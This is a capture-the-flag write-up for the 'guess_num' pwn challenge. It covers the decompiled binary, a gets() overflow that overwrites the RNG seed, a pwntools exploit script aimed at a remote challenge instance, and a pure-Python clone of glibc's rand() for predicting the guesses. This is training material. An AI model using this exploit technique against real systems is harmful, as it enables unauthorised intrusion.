PWN Attack and Defense World (adworld): guess_num
2022-06-29 02:38:00 【Day-3】

First, look at the file attributes and the protections. checksec shows essentially everything enabled: the decompiled main below reads a stack canary from fs:0x28, and the low function addresses (sub_BB0, sub_C3E) are consistent with a PIE binary. Drop the file into IDA.
```c
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v4; // [rsp+4h] [rbp-3Ch] BYREF
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7[32]; // [rsp+10h] [rbp-30h] BYREF      name buffer; gets() has no length limit
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]  0x20 bytes above v7: reachable by the overflow
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]    stack canary, directly after seed

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();          // original seed, whatever sub_BB0() returns
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:");
  gets(v7);                             // overflow: name bytes 0x20..0x27 overwrite seed
  srand(seed[0]);                       // only the low 4 bytes of seed are used
  for ( i = 0; i <= 9; ++i )
  {
    v6 = rand() % 6 + 1;                // deterministic once seed is known
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();                            // reached after 10 correct guesses; cats the flag
  return 0LL;
}
```
Open the binary in IDA64, find main and press F5 to decompile. The logic is: gets() reads a name into v7, a 32-byte buffer at rbp-0x30, with no length check; the random number generator is then seeded with seed[0], which sits at rbp-0x10, directly above the buffer; each of the 10 rounds draws rand() % 6 + 1 and compares it with an integer read by scanf; one mismatch calls exit(1), ten matches call sub_C3E(), which cats the flag. Two facts make this exploitable. First, gets() lets the name overflow v7 by 0x20 bytes into seed, so we control the seed. Second, glibc's rand() is fully deterministic for a given seed, so the ten values can be reproduced locally with the same srand()/rand() calls. Check the layout before writing the payload: the canary v9 is at rbp-0x8, immediately after seed, and a 0x28-byte name fills the stack exactly up to it. The terminating NUL that gets() appends lands on the canary's lowest byte, which glibc always keeps at 0x00, so the canary check still passes. srand() takes an unsigned int, so of the 8 bytes written over seed only the low 4 bytes (seed[0]) matter; p64(1) sets seed[0] = 1 and seed[1] = 0.
Exploit script:
```python
from pwn import *
from ctypes import cdll

context(os='linux', arch='amd64', log_level='debug')

LOCAL = False        # True: run ./guess_num locally; False: attack the remote instance
SEED = 1             # value planted in seed[0] through the gets() overflow


def send_guesses(io, seed):
    # Reproduce the target's rand() stream with the local glibc: same seed, same sequence.
    libc = cdll.LoadLibrary("libc.so.6")
    libc.srand(seed)
    for _ in range(10):
        number = libc.rand() % 6 + 1
        io.recvuntil(b"Please input your guess number:")
        io.sendline(str(number).encode())


def main():
    if LOCAL:
        io = process("./guess_num")
    else:
        io = remote("111.200.241.244", 49182)
    # v7 is at rbp-0x30 and seed at rbp-0x10: 0x20 bytes of filler, then the seed as a qword.
    payload = b'a' * (0x30 - 0x10) + p64(SEED)
    io.recvuntil(b"Your name:")
    io.sendline(payload)
    send_guesses(io, SEED)
    io.interactive()


if __name__ == "__main__":
    main()
```
Run the script: after the tenth "Success!" sub_C3E() runs and prints the flag.
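The script above leans on ctypes and a local libc.so.6 to replay rand(). As an added example (not part of the original write-up, and going beyond it by handling any 32-bit seed, not just 1), here is a pure-Python clone of glibc's rand() (the default TYPE_3 additive-feedback generator with a 31-word state), together with a builder for the name payload derived from the stack offsets in the decompile. The function names glibc_random, first_outputs, predict_guesses and build_name_payload are my own; the remote is assumed to use glibc, which is the case for this challenge.

```python
import struct
from collections import deque

# Added example, not the write-up's own code: a pure-Python clone of glibc's
# rand()/random() so the guesses can be predicted without loading libc.so.6.


def _c_div(a, b):
    """C-style division: quotient truncates toward zero, remainder keeps the dividend's sign."""
    q = abs(a) // abs(b)
    if (a < 0) != (b < 0):
        q = -q
    return q, a - q * b


def glibc_random(seed):
    """Yield the values glibc's rand() returns after srand(seed), in order."""
    seed &= 0xffffffff
    if seed == 0:                       # glibc substitutes 1 for a zero seed
        seed = 1
    word = seed - (1 << 32) if seed >= (1 << 31) else seed   # int32_t view of the seed
    r = [seed]
    for _ in range(30):                 # r[1..30]: Park-Miller LCG via Schrage's method
        hi, lo = _c_div(word, 127773)
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word)
    for i in range(31, 34):             # r[31..33] copy r[0..2]
        r.append(r[i - 31])
    window = deque(r[3:], maxlen=31)    # holds r[i-31] .. r[i-1]
    i = 34
    while True:                         # r[i] = r[i-31] + r[i-3] mod 2^32
        val = (window[0] + window[28]) & 0xffffffff
        window.append(val)
        if i >= 344:                    # srandom() discards the first 310 outputs
            yield val >> 1              # rand() drops the least significant bit
        i += 1


def first_outputs(seed, n):
    """First n rand() values for a given seed."""
    rng = glibc_random(seed)
    return [next(rng) for _ in range(n)]


def predict_guesses(seed, rounds=10, sides=6):
    """The sequence main() checks: rand() % 6 + 1, ten times."""
    return [v % sides + 1 for v in first_outputs(seed, rounds)]


# Stack layout from the decompile: v7 at rbp-0x30, seed at rbp-0x10, canary at rbp-0x8.
NAME_BUF_OFF = 0x30
SEED_OFF = 0x10


def build_name_payload(seed=1):
    """Name that overflows v7 and lands `seed` in seed[0]; srand() only reads the low 4 bytes."""
    return b"a" * (NAME_BUF_OFF - SEED_OFF) + struct.pack("<Q", seed)


if __name__ == "__main__":
    print(build_name_payload())
    print(predict_guesses(1))   # [2, 5, 4, 2, 6, 2, 5, 1, 4, 2]
```

To use it from the exploit, replace the libc.srand()/libc.rand() loop with predict_guesses(SEED) and send each value; this also works from a macOS or Windows host where cdll.LoadLibrary("libc.so.6") would fail. The payload stays 0x28 bytes: the NUL gets() appends falls on the canary's low byte, which is 0x00 anyway.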